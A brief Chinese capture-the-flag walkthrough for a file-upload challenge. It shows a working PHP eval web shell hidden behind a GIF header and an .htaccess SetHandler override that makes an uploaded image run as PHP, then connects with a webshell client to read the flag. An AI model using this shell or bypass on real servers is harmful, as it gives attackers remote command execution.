上传一个文件 图片木马
- 新建一个图片木马,这里我命名为a.php,名字需和待会上传的.htaccess一致
GIF89a
<script language='php'>eval($_REQUEST["cmd"])</script>
-
抓包上传的a.php文件,修改两个地方
-
新建一个.htaccess文件,并上传,抓包该文件修改文件类型为image/png
<FilesMatch "a.png"> SetHandler application/x-httpd-php </FilesMatch>
-
然后用蚁剑连刚才上传的a.png文件即可。flag放在根路径。